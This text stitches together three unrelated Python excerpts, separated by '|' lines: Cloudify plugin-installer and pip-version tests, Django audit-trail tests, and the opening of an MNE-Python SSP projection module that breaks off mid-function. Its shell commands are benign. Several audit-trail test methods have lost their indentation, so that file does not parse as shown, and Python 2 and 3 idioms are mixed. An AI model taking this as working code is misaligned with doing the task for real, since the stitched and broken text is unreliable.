                except Exception as e:
                    logger.info('failed to stop local file server: {0}'
                                .format(str(e)))

    @classmethod
    def tearDownClass(cls):
        if test_file_server:
            try:
                test_file_server.stop()
            except Exception as e:
                # BUG FIX: str(e) instead of the Python-2-only e.message.
                logger.info('failed to stop local file server: {0}'
                            .format(str(e)))

    def setUp(self):
        super(PluginInstallerTestCase, self).setUp()
        self.temp_folder = tempfile.mkdtemp()

        # Create a virtualenv in a temp folder.
        # this will be used for actually installing plugins of tests.
        os.environ[LOCAL_IP_KEY] = 'localhost'
        LocalCommandRunner().run('virtualenv {0}'.format(self.temp_folder))
        os.environ[VIRTUALENV_PATH_KEY] = self.temp_folder
        self.ctx = MockCloudifyContext(
            blueprint_id=TEST_BLUEPRINT_ID
        )
        os.environ[CELERY_WORK_DIR_PATH_KEY] = self.temp_folder
        os.environ[MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL_KEY] \
            = MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL

    def tearDown(self):
        if os.path.exists(self.temp_folder):
            shutil.rmtree(self.temp_folder)
        super(PluginInstallerTestCase, self).tearDown()

    def _assert_plugin_installed(self, package_name,
                                 plugin, dependencies=None):
        """Assert *package_name* (and any *dependencies*) appear in the
        test virtualenv's ``pip list`` output."""
        if not dependencies:
            dependencies = []
        runner = LocalCommandRunner()
        out = runner.run(
            '{0}/bin/pip list | grep {1}'
            .format(self.temp_folder, plugin['name'])).std_out
        self.assertIn(package_name, out)
        for dependency in dependencies:
            self.assertIn(dependency, out)

    def test_get_url_and_args_http_no_args(self):
        url, args = get_url_and_args(self.ctx.blueprint.id,
                                     {'source': 'http://google.com'})
        self.assertEqual(url, 'http://google.com')
        self.assertEqual(args, '')

    def test_get_url_https(self):
        url, args = get_url_and_args(self.ctx.blueprint.id,
                                     {'source': 'https://google.com',
                                      'install_arguments': '--pre'})
        self.assertEqual(url, 'https://google.com')
        self.assertEqual(args, '--pre')

    def test_get_url_faulty_schema(self):
        self.assertRaises(NonRecoverableError,
                          get_url_and_args,
                          self.ctx.blueprint.id,
                          {'source': 'bla://google.com'})

    def test_get_url_and_args_local_plugin(self):
        mock_plugin = {
            'source': MOCK_PLUGIN,
            'install_arguments': '-r requirements'
        }
        url, args = get_url_and_args(self.ctx.blueprint.id, mock_plugin)
        # NOTE(review): only the URL is asserted here; ``args`` is never
        # checked — consider asserting it as well.
        self.assertEqual(url,
                         '{0}/{1}/{2}.{3}'
                         .format(
                             MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL,
                             PLUGINS_DIR,
                             MOCK_PLUGIN, ZIP_SUFFIX))

    def test_extract_url(self):
        plugin_source = '{0}/{1}/{2}.{3}'.format(
            MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL, PLUGINS_DIR,
            MOCK_PLUGIN, TAR_SUFFIX)
        plugin = {
            'name': MOCK_PLUGIN,
            'source': plugin_source
        }
        url, args = get_url_and_args(self.ctx.blueprint.id, plugin)
        source_plugin_path = os.path.join(dirname(__file__), MOCK_PLUGIN)
        extracted_plugin_path = extract_plugin_dir(url)
        # The downloaded + extracted tree must mirror the source tree.
        self.assertTrue(PluginInstallerTestCase.are_dir_trees_equal(
            source_plugin_path, extracted_plugin_path))

    def test_install(self):
        plugin_source = '{0}/{1}/{2}.{3}'.format(
            MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL, PLUGINS_DIR,
            MOCK_PLUGIN, TAR_SUFFIX)
        plugin = {
            'name': MOCK_PLUGIN,
            'source': plugin_source
        }

        ctx = MockCloudifyContext(blueprint_id=TEST_BLUEPRINT_ID)
        install(ctx, plugins=[plugin])
        self._assert_plugin_installed(MOCK_PLUGIN, plugin)

        # Assert includes file was written
        out = LocalCommandRunner().run(
            'cat {0}'.format(
                os.path.join(self.temp_folder,
                             'celeryd-includes'))).std_out
        self.assertIn('mock_for_test.module', out)

    def test_install_with_dependencies(self):
        plugin_source = '{0}/{1}/{2}.{3}'.format(
            MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL, PLUGINS_DIR,
            MOCK_PLUGIN_WITH_DEPENDENCIES, TAR_SUFFIX)
        plugin = {
            'name': MOCK_PLUGIN_WITH_DEPENDENCIES,
            'source': plugin_source
        }

        ctx = MockCloudifyContext(blueprint_id=TEST_BLUEPRINT_ID)
        install(ctx, plugins=[plugin])
        self._assert_plugin_installed(MOCK_PLUGIN_WITH_DEPENDENCIES,
                                      plugin,
                                      dependencies=['simplejson'])

        # Assert includes file was written
        out = LocalCommandRunner().run(
            'cat {0}'.format(
                os.path.join(self.temp_folder,
                             'celeryd-includes'))).std_out
        self.assertIn('mock_with_dependencies_for_test.module', out)

    def test_install_with_install_args(self):
        plugin_source = '{0}/{1}/{2}.{3}'.format(
            MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL, PLUGINS_DIR,
            MOCK_PLUGIN_WITH_INSTALL_ARGS, TAR_SUFFIX)
        plugin = {
            'name': MOCK_PLUGIN_WITH_INSTALL_ARGS,
            'source': plugin_source,
            'install_arguments': '-r requirements.txt'
        }

        ctx = MockCloudifyContext(blueprint_id=TEST_BLUEPRINT_ID)
        install(ctx, plugins=[plugin])
        # cloudify-rest-client is specified in requirements.txt
        self._assert_plugin_installed(MOCK_PLUGIN_WITH_INSTALL_ARGS,
                                      plugin,
                                      dependencies=['cloudify-rest-client'])

        # Assert includes file was written
        out = LocalCommandRunner().run(
            'cat {0}'.format(
                os.path.join(self.temp_folder,
                             'celeryd-includes'))).std_out
        self.assertIn('mock_with_install_args_for_test.module', out)

    def test_write_to_empty_includes(self):
        update_includes(['a.tasks', 'b.tasks'])

        # The includes file will be created
        # in the temp folder for this test
        with open('{0}/celeryd-includes'
                  .format(self.temp_folder), mode='r') as f:
            includes = f.read()
            # assertEquals is a deprecated alias; use assertEqual
            self.assertEqual("INCLUDES=a.tasks,b.tasks\n", includes)

    def test_write_to_existing_includes(self):
        # Create initial includes file
        update_includes(['test.tasks'])

        # Append to that file
        update_includes(['a.tasks', 'b.tasks'])
        with open('{0}/celeryd-includes'
                  .format(self.temp_folder), mode='r') as f:
            includes = f.read()
            self.assertEqual(
                "INCLUDES=test.tasks,a.tasks,b.tasks\n",
                includes)

    @staticmethod
    def create_plugin_tar(plugin_dir_name):
        """Tar the given mock-plugin directory into '<blueprint>/plugins'."""
        plugin_source_path = os.path.join(dirname(__file__), plugin_dir_name)

        # create the plugins directory if doesn't exist
        plugins_dir_path = os.path.join(dirname(__file__), PLUGINS_DIR)
        if not os.path.exists(plugins_dir_path):
            os.makedirs(plugins_dir_path)

        # the tar file will be created under mock_blueprint_id/plugins
        target_tar_file_path = '{0}/{1}.{2}'.format(plugins_dir_path,
                                                    plugin_dir_name,
                                                    TAR_SUFFIX)

        # create the file, if it doesn't exist
        if not os.path.exists(target_tar_file_path):
            plugin_tar_file = tarfile.TarFile(target_tar_file_path, 'w')
            try:
                plugin_tar_file.add(plugin_source_path, plugin_dir_name)
            finally:
                # ensure the archive handle is closed even if add() fails
                plugin_tar_file.close()

    @staticmethod
    def are_dir_trees_equal(dir1, dir2):
        """
        Compare two directories recursively. Files in each directory are
        assumed to be equal if their names and contents are equal.

        @param dir1: First directory path
        @param dir2: Second directory path
        @return: True if the directory trees are the same and
            there were no errors while accessing the directories or files,
            False otherwise.
        """

        # compare file lists in both dirs. If found different lists
        # or "funny" files (failed to compare) - return false
        dirs_cmp = filecmp.dircmp(dir1, dir2)
        if len(dirs_cmp.left_only) > 0 or len(dirs_cmp.right_only) > 0 or \
                len(dirs_cmp.funny_files) > 0:
            return False

        # compare the common files between dir1 and dir2
        (match, mismatch, errors) = filecmp.cmpfiles(
            dir1, dir2, dirs_cmp.common_files, shallow=False)
        if len(mismatch) > 0 or len(errors) > 0:
            return False

        # continue to compare sub-directories, recursively
        for common_dir in dirs_cmp.common_dirs:
            new_dir1 = os.path.join(dir1, common_dir)
            new_dir2 = os.path.join(dir2, common_dir)
            if not PluginInstallerTestCase.are_dir_trees_equal(
                    new_dir1, new_dir2):
                return False
        return True
class PipVersionParserTestCase(testtools.TestCase):
    """Unit tests for parse_pip_version() and is_pip6_or_higher()."""

    def test_parse_long_format_version(self):
        version_tupple = parse_pip_version('1.5.4')
        self.assertEqual(('1', '5', '4'), version_tupple)

    def test_parse_short_format_version(self):
        version_tupple = parse_pip_version('6.0')
        self.assertEqual(('6', '0', ''), version_tupple)

    def test_pip6_not_higher(self):
        result = is_pip6_or_higher('1.5.4')
        self.assertEqual(result, False)

    def test_pip6_exactly(self):
        result = is_pip6_or_higher('6.0')
        self.assertEqual(result, True)

    def test_pip6_is_higher(self):
        result = is_pip6_or_higher('6.0.6')
        self.assertEqual(result, True)

    def test_parse_invalid_major_version(self):
        expected_err_msg = 'Invalid pip version: "a.5.4", major version is ' \
                           '"a" while expected to be a number'
        self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
                               parse_pip_version, 'a.5.4')

    def test_parse_invalid_minor_version(self):
        expected_err_msg = 'Invalid pip version: "1.a.4", minor version is ' \
                           '"a" while expected to be a number'
        self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
                               parse_pip_version, '1.a.4')

    def test_parse_too_short_version(self):
        # BUG FIX: the message doubles as a regex, and "\(" inside a plain
        # string literal is an invalid escape sequence on modern Python —
        # raw strings make the regex escapes explicit.
        expected_err_msg = 'Unknown formatting of pip version: ' \
                           '"6", expected ' \
                           'dot-delimited numbers ' \
                           r'\(e.g. "1.5.4", "6.0"\)'
        self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
                               parse_pip_version, '6')

    def test_parse_numeric_version(self):
        expected_err_msg = 'Invalid pip version: 6 is not a string'
        self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
                               parse_pip_version, 6)

    def test_parse_alpha_version(self):
        expected_err_msg = 'Unknown formatting of pip ' \
                           'version: "a", expected ' \
                           'dot-delimited ' \
                           r'numbers \(e.g. "1.5.4", "6.0"\)'
        self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
                               parse_pip_version, 'a')

    def test_parse_wrong_obj(self):
        expected_err_msg = r'Invalid pip version: \[6\] is not a string'
        self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
                               parse_pip_version, [6])
|
|
import datetime
from django.test import TestCase
import audit_trail
from audit_trail.models import AuditTrail
from ..models import TestModelTrackAllFields, TestModelTrackOneField, TestModelWithFieldLabels, \
Post, Comment, User, AA, AB, BB, ShortcutTestModel, Post1, Comment1, Person, Animal, SomePerson
class TestAuditTrail(TestCase):
    def test_create_audit_trail_on_creation(self):
        """Creating an instance records one CREATED trail with a None->value diff."""
        model = TestModelTrackAllFields.objects.create(char='a')
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
        self.assertEqual(trail.get_changes(), {
            'char': {
                'old_value': None,
                'old_value_string': None,
                'new_value': 'a',
                'new_value_string': 'a',
                'field_label': 'Char'
            }
        })
    def test_create_audit_trail_on_deletion(self):
        """Deleting an instance records a DELETED trail with a value->None diff."""
        model = TestModelTrackAllFields.objects.create(char='a')
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        model.delete()
        self.assertEqual(AuditTrail.objects.all().count(), 2)
        # Trails appear newest-first, so index 0 is the deletion trail.
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.DELETED)
        self.assertEqual(trail.get_changes(), {
            'char': {
                'old_value': 'a',
                'old_value_string': 'a',
                'new_value': None,
                'new_value_string': None,
                'field_label': 'Char'
            }
        })
    def test_audit_for_selected_field(self):
        """Only the tracked field ('char') generates trails; saving changes
        to other fields ('text') adds no trail."""
        self.assertEqual(AuditTrail.objects.all().count(), 0)
        model = TestModelTrackOneField.objects.create(char='a')
        model.text = 'sometext'
        model.save()
        # Untracked-field change: count is still 1 (creation only).
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        model.char = 'b'
        model.save()
        self.assertEqual(AuditTrail.objects.all().count(), 2)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
        self.assertEqual(trail.get_changes(), {
            'char': {
                'old_value': 'a',
                'old_value_string': 'a',
                'new_value': 'b',
                'new_value_string': 'b',
                'field_label': 'Char'
            }
        })
    def test_audit_trail_history_for_all_fields(self):
        """Each save produces one UPDATED trail (newest first) containing
        only the fields that actually changed in that save."""
        model = TestModelTrackAllFields.objects.create(char='a', char2='x')
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        model.char = 'b'
        model.save()
        self.assertEqual(AuditTrail.objects.all().count(), 2)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
        self.assertEqual(trail.get_changes(), {
            'char': {
                'old_value': 'a',
                'old_value_string': 'a',
                'new_value': 'b',
                'new_value_string': 'b',
                'field_label': 'Char'
            }
        })
        model.char2 = 'y'
        model.save()
        self.assertEqual(AuditTrail.objects.all().count(), 3)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
        self.assertEqual(trail.get_changes(), {
            'char2': {
                'old_value': 'x',
                'old_value_string': 'x',
                'new_value': 'y',
                'new_value_string': 'y',
                'field_label': 'Char2'
            }
        })
        # The previous update's trail is still intact at index 1.
        trail = AuditTrail.objects.all()[1]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
        self.assertEqual(trail.get_changes(), {
            'char': {
                'old_value': 'a',
                'old_value_string': 'a',
                'new_value': 'b',
                'new_value_string': 'b',
                'field_label': 'Char'
            }
        })
        # Changing two fields in one save yields one trail with both diffs.
        model.char = 'c'
        model.char2 = 'z'
        model.save()
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
        self.assertEqual(trail.get_changes(), {
            'char': {
                'old_value': 'b',
                'old_value_string': 'b',
                'new_value': 'c',
                'new_value_string': 'c',
                'field_label': 'Char'
            },
            'char2': {
                'old_value': 'y',
                'old_value_string': 'y',
                'new_value': 'z',
                'new_value_string': 'z',
                'field_label': 'Char2'
            }
        })
def test_field_labels(self):
TestModelWithFieldLabels.objects.create(char='a', char2='x', char_3='1')
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.get_changes()['char']['field_label'], 'Char 1')
self.assertEqual(trail.get_changes()['char2']['field_label'], 'Char 2')
self.assertEqual(trail.get_changes()['char_3']['field_label'], 'Char 3')
def test_related_tracking_init_watcher_for_subclass(self):
# We only initialized audit on Post but Comment.should be created automatically
self.assertIsNotNone(getattr(Comment, 'audit', None))
    def test_related_tracking(self):
        """Creating a Comment linked to a Post records the comment trail plus
        a RELATED_CHANGED trail on the post, linked via related_trail."""
        author = User.objects.create()
        post = Post.objects.create(author=author)
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        # A comment with no post adds no trail (count stays at 1).
        comment = Comment.objects.create()
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        comment = Comment.objects.create(post=post)
        self.assertEqual(AuditTrail.objects.all().count(), 3)
        post_trail = AuditTrail.objects.all()[0]
        comment_trail = AuditTrail.objects.all()[1]
        self.assertEqual(post_trail.action, AuditTrail.ACTIONS.RELATED_CHANGED)
        self.assertEqual(post_trail.related_trail, comment_trail)
    def test_fk_tracking(self):
        """Changing or deleting a tracked FK target (the post's author) also
        records RELATED_CHANGED trails on the referencing Post."""
        author = User.objects.create()
        self.assertEqual(AuditTrail.objects.all().count(), 0)
        post = Post.objects.create(author=author)
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        author.name = 'new name'
        author.save()
        # Author update -> author trail + post RELATED_CHANGED trail.
        self.assertEqual(AuditTrail.objects.all().count(), 3)
        post_trail = AuditTrail.objects.all()[0]
        user_trail = AuditTrail.objects.all()[1]
        self.assertEqual(post_trail.action, AuditTrail.ACTIONS.RELATED_CHANGED)
        self.assertEqual(post_trail.related_trail, user_trail)
        author.delete()
        self.assertEqual(AuditTrail.objects.all().count(), 5)
def test_related_tracking_ordering(self):
self.assertEqual(AA.audit.track_related, ['ab_set'])
self.assertEqual(BB.audit.track_related, ['ab_set'])
self.assertEqual(AB.audit.track_only_with_related, False)
self.assertEqual(sorted(AB.audit.notify_related), ['aa', 'bb'])
    def test_shortcut(self):
        """A model wired up via the shortcut API records CREATED trails the
        same way as explicitly-registered models."""
        model = ShortcutTestModel.objects.create(name='a')
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
        self.assertEqual(trail.get_changes(), {
            'name': {
                'old_value': None,
                'old_value_string': None,
                'new_value': 'a',
                'new_value_string': 'a',
                'field_label': 'Name'
            }
        })
def test_shortcut_override_class_attribute(self):
self.assertEqual(Post1.audit.track_related, ['comment1_set'])
self.assertEqual(Comment1.audit.track_only_with_related, False)
self.assertEqual(Comment1.audit.fields, ['text'])
    def test_queryset_changes(self):
        """get_for_object(...).get_changes() folds the per-trail diffs into a
        cumulative original->latest diff per field."""
        model = TestModelTrackAllFields.objects.create(char='a')
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
        self.assertEqual(trail.get_changes(), {
            'char': {
                'old_value': None,
                'old_value_string': None,
                'new_value': 'a',
                'new_value_string': 'a',
                'field_label': 'Char'
            }
        })
        model.char2 = 'b'
        model.save()
        self.assertEqual(AuditTrail.objects.all().count(), 2)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
        self.assertEqual(trail.get_changes(), {
            'char2': {
                'old_value': None,
                'old_value_string': None,
                'new_value': 'b',
                'new_value_string': 'b',
                'field_label': 'Char2'
            }
        })
        # Aggregated changes also carry the 'field_name' key.
        trails = audit_trail.get_for_object(model)
        self.assertEqual(trails.get_changes()['char2'], {
            'old_value': None,
            'old_value_string': None,
            'new_value': 'b',
            'new_value_string': 'b',
            'field_label': 'Char2',
            'field_name': 'char2'
        })
        self.assertEqual(trails.get_changes()['char'], {
            'old_value': None,
            'old_value_string': None,
            'new_value': 'a',
            'new_value_string': 'a',
            'field_label': 'Char',
            'field_name': 'char'
        })
        model.char = 'AAA'
        model.save()
        self.assertEqual(AuditTrail.objects.all().count(), 3)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
        self.assertEqual(trail.get_changes(), {
            'char': {
                'old_value': 'a',
                'old_value_string': 'a',
                'new_value': 'AAA',
                'new_value_string': 'AAA',
                'field_label': 'Char'
            }
        })
        # After a second update the aggregate spans None -> latest value.
        trails = audit_trail.get_for_object(model)
        changes = trails.get_changes()
        self.assertEqual(changes['char2'], {
            'old_value': None,
            'old_value_string': None,
            'new_value': 'b',
            'new_value_string': 'b',
            'field_label': 'Char2',
            'field_name': 'char2'
        })
        self.assertEqual(changes['char'], {
            'old_value': None,
            'old_value_string': None,
            'new_value': 'AAA',
            'new_value_string': 'AAA',
            'field_label': 'Char',
            'field_name': 'char'
        })
    def test_queryset_changes_reset_if_same_value(self):
        """A field that ends up back at its original value drops out of the
        aggregated queryset changes entirely."""
        model = TestModelTrackAllFields.objects.create(char='a')
        self.assertEqual(AuditTrail.objects.all().count(), 1)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
        self.assertEqual(trail.get_changes(), {
            'char': {
                'old_value': None,
                'old_value_string': None,
                'new_value': 'a',
                'new_value_string': 'a',
                'field_label': 'Char'
            }
        })
        model.char2 = 'b'
        model.save()
        self.assertEqual(AuditTrail.objects.all().count(), 2)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
        self.assertEqual(trail.get_changes(), {
            'char2': {
                'old_value': None,
                'old_value_string': None,
                'new_value': 'b',
                'new_value_string': 'b',
                'field_label': 'Char2'
            }
        })
        # Revert char2 back to None: the per-save trail is still recorded...
        model.char2 = None
        model.save()
        self.assertEqual(AuditTrail.objects.all().count(), 3)
        trail = AuditTrail.objects.all()[0]
        self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
        self.assertEqual(trail.get_changes(), {
            'char2': {
                'old_value': 'b',
                'old_value_string': 'b',
                'new_value': None,
                'new_value_string': None,
                'field_label': 'Char2'
            }
        })
        # ...but the aggregated changes show only 'char' (net change of
        # 'char2' is zero).
        trails = audit_trail.get_for_object(model)
        self.assertEqual(len(trails.get_changes().keys()), 1)
        self.assertEqual(trails.get_changes(), {
            'char': {
                'old_value': None,
                'old_value_string': None,
                'new_value': 'a',
                'new_value_string': 'a',
                'field_label': 'Char',
                'field_name': 'char',
            }
        })
def test_queryset_get_related_changes(self):
"""
1. Create post
2. Create comment 1
3. Create comment 2
--- Testing changes
4. Delete comment 1
5. Change comment 3
6. Create comment 3
"""
author = User.objects.create()
post = Post.objects.create(author=author)
comment1 = Comment.objects.create(post=post, text='comment 1 text')
comment2 = Comment.objects.create(post=post, text='comment 2 text')
time_from = datetime.datetime.now()
comment1.delete()
comment2.text = 'comment 2 text change'
comment2.save()
comment3 = Comment.objects.create(post=post, text='comment 3 text')
# Do not display created and deleted object during period
comment4 = Comment.objects.create(post=post, text='comment 3 text')
comment4.delete()
trails = audit_trail.get_for_object(post).filter(action_time__gt=time_from).order_by()
related_objects_changes = trails.get_related_changes()
self.assertEqual(len(related_objects_changes), 3)
comment1_changes = related_objects_changes[0]
self.assertEqual(comment1_changes['representation'], 'Comment 1')
self.assertEqual(comment1_changes['action'], 'Deleted')
self.assertEqual(comment1_changes['model'], 'test_app.comment')
self.assertEqual(comment1_changes['changes']['text'], {
'old_value': u'comment 1 text',
'old_value_string': u'comment 1 text',
'new_value': None,
'new_value_string': None,
'field_name': 'text',
'field_label': u'Text'
})
comment2_changes = related_objects_changes[1]
self.assertEqual(comment2_changes['representation'], 'Comment 2')
self.assertEqual(comment2_changes['action'], 'Updated')
self.assertEqual(comment1_changes['model'], 'test_app.comment')
self.assertEqual(comment2_changes['changes']['text'], {
'field_label': u'Text',
'new_value': u'comment 2 text change',
'new_value_string': u'comment 2 text change',
'old_value': u'comment 2 text',
'old_value_string': u'comment 2 text',
'field_name': 'text',
})
comment3_changes = related_objects_changes[2]
self.assertEqual(comment3_changes['representation'], 'Comment 3')
self.assertEqual(comment3_changes['action'], 'Created')
self.assertEqual(comment1_changes['model'], 'test_app.comment')
self.assertEqual(comment3_changes['changes']['text'], {
'old_value': None,
'old_value_string': None,
'new_value': u'comment 3 text',
'new_value_string': u'comment 3 text',
'field_label': u'Text',
'field_name': 'text'
})
def test_related_object_change(self):
dog = Animal.objects.create(name='Dog')
snake = Animal.objects.create(name='Snake')
man = Person.objects.create()
man.pet = dog
man.save()
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'pet': {
'old_value': None,
'old_value_string': None,
'new_value': unicode(dog.id),
'new_value_string': unicode(dog),
'field_label': u'Pet'
}
})
man.pet = snake
man.save()
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'pet': {
'old_value': unicode(dog.id),
'old_value_string': unicode(dog),
'new_value': unicode(snake.id),
'new_value_string': unicode(snake),
'field_label': u'Pet'
}
})
man.pet = None
man.save()
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'pet': {
'old_value': unicode(snake.id),
'old_value_string': unicode(snake),
'new_value': None,
'new_value_string': None,
'field_label': u'Pet'
}
})
def test_values_with_choices(self):
person = SomePerson.objects.create(season="1")
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
self.assertEqual(trail.get_changes()['season'], {
'new_value_string': 'Spring',
'new_value': '1',
'old_value_string': 'Winter',
'old_value': '0',
'field_label': 'Season'
})
|
|
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
#
# License: BSD (3-clause)
import numpy as np
from scipy import linalg
from . import io, Epochs
from .utils import check_fname, logger, verbose
from .io.pick import pick_types, pick_types_forward
from .io.proj import Projection, _has_eeg_average_ref_proj
from .event import make_fixed_length_events
from .parallel import parallel_func
from .cov import _check_n_samples
from .forward import (is_fixed_orient, _subject_from_forward,
convert_forward_solution)
from .source_estimate import SourceEstimate, VolSourceEstimate
from .io.proj import make_projector, make_eeg_average_ref_proj
def read_proj(fname):
    """Load SSP projection vectors from a FIF file.

    Parameters
    ----------
    fname : string
        Path of the file holding the projection vectors. It should end
        with -proj.fif or -proj.fif.gz.

    Returns
    -------
    projs : list
        The projection vectors read from the file.

    See Also
    --------
    write_proj
    """
    # Validate the filename suffix before touching the filesystem.
    check_fname(fname, 'projection', ('-proj.fif', '-proj.fif.gz'))
    fiff_file, tree, _ = io.fiff_open(fname)
    with fiff_file as fid:
        return io.proj._read_proj(fid, tree)
def write_proj(fname, projs):
    """Write projections to a FIF file.

    Parameters
    ----------
    fname : string
        The name of file containing the projections vectors. It should end
        with -proj.fif or -proj.fif.gz.
    projs : list
        The list of projection vectors.

    See Also
    --------
    read_proj
    """
    check_fname(fname, 'projection', ('-proj.fif', '-proj.fif.gz'))
    fid = io.write.start_file(fname)
    try:
        io.proj._write_proj(fid, projs)
    finally:
        # Always finalize the FIF file so a failure inside _write_proj does
        # not leak the open file handle.
        io.write.end_file(fid)
@verbose
def _compute_proj(data, info, n_grad, n_mag, n_eeg, desc_prefix, verbose=None):
    """Compute SSP vectors from a data covariance matrix.

    For each channel type (gradiometers, magnetometers, EEG) the
    corresponding sub-matrix of ``data`` is decomposed with an SVD and the
    leading singular vectors become the (inactive) projection vectors.

    Parameters
    ----------
    data : ndarray
        Data covariance matrix (n_channels x n_channels); ``data[i][:, i]``
        sub-blocks are taken per channel type.
    info : dict
        Measurement info describing the channels of ``data``.
    n_grad : int
        Number of vectors to keep for gradiometers.
    n_mag : int
        Number of vectors to keep for magnetometers.
    n_eeg : int
        Number of vectors to keep for EEG channels.
    desc_prefix : str
        Text inserted into each projector's description string.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    projs : list of Projection
        The computed projection vectors (created with ``active=False``).
    """
    # Indices of good channels per type (bad channels are excluded).
    mag_ind = pick_types(info, meg='mag', ref_meg=False, exclude='bads')
    grad_ind = pick_types(info, meg='grad', ref_meg=False, exclude='bads')
    eeg_ind = pick_types(info, meg=False, eeg=True, ref_meg=False,
                         exclude='bads')
    # Silently drop requests for channel types that are not present.
    if (n_grad > 0) and len(grad_ind) == 0:
        logger.info("No gradiometers found. Forcing n_grad to 0")
        n_grad = 0
    if (n_mag > 0) and len(mag_ind) == 0:
        logger.info("No magnetometers found. Forcing n_mag to 0")
        n_mag = 0
    if (n_eeg > 0) and len(eeg_ind) == 0:
        logger.info("No EEG channels found. Forcing n_eeg to 0")
        n_eeg = 0
    ch_names = info['ch_names']
    grad_names, mag_names, eeg_names = ([ch_names[k] for k in ind]
                                        for ind in [grad_ind, mag_ind,
                                                    eeg_ind])
    projs = []
    for n, ind, names, desc in zip([n_grad, n_mag, n_eeg],
                                   [grad_ind, mag_ind, eeg_ind],
                                   [grad_names, mag_names, eeg_names],
                                   ['planar', 'axial', 'eeg']):
        if n == 0:
            continue
        # Restrict the covariance to this channel type only.
        data_ind = data[ind][:, ind]
        # data is the covariance matrix: U * S**2 * Ut
        U, Sexp2, _ = linalg.svd(data_ind, full_matrices=False,
                                 overwrite_a=True)
        # Keep the n leading components and their explained variance.
        U = U[:, :n]
        exp_var = Sexp2 / Sexp2.sum()
        exp_var = exp_var[:n]
        for k, (u, var) in enumerate(zip(U.T, exp_var)):
            proj_data = dict(col_names=names, row_names=None,
                             data=u[np.newaxis, :], nrow=1, ncol=u.size)
            this_desc = "%s-%s-PCA-%02d" % (desc, desc_prefix, k + 1)
            logger.info("Adding projection: %s" % this_desc)
            proj = Projection(active=False, data=proj_data,
                              desc=this_desc, kind=1, explained_var=var)
            projs.append(proj)
    return projs
@verbose
def compute_proj_epochs(epochs, n_grad=2, n_mag=2, n_eeg=2, n_jobs=1,
                        desc_prefix=None, verbose=None):
    """Compute SSP (spatial space projection) vectors on Epochs

    Parameters
    ----------
    epochs : instance of Epochs
        The epochs containing the artifact
    n_grad : int
        Number of vectors for gradiometers
    n_mag : int
        Number of vectors for magnetometers
    n_eeg : int
        Number of vectors for EEG channels
    n_jobs : int
        Number of jobs to use to compute covariance
    desc_prefix : str | None
        The description prefix to use. If None, one will be created based on
        the event_id, tmin, and tmax.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    projs: list
        List of projection vectors

    See Also
    --------
    compute_proj_raw, compute_proj_evoked
    """
    # Accumulate the data covariance over all good epochs.
    cov = _compute_cov_epochs(epochs, n_jobs)
    if desc_prefix is None:
        # Build a descriptive label from the event id(s) and epoch window.
        event_id = epochs.event_id
        if event_id is None or len(list(event_id.keys())) == 0:
            label = '0'
        elif len(event_id.keys()) == 1:
            label = str(list(event_id.values())[0])
        else:
            label = 'Multiple-events'
        desc_prefix = "%s-%-.3f-%-.3f" % (label, epochs.tmin, epochs.tmax)
    return _compute_proj(cov, epochs.info, n_grad, n_mag, n_eeg, desc_prefix)
def _compute_cov_epochs(epochs, n_jobs):
    """Accumulate the (unnormalized) data covariance over all good epochs."""
    # Compute e @ e.T per epoch, possibly in parallel.
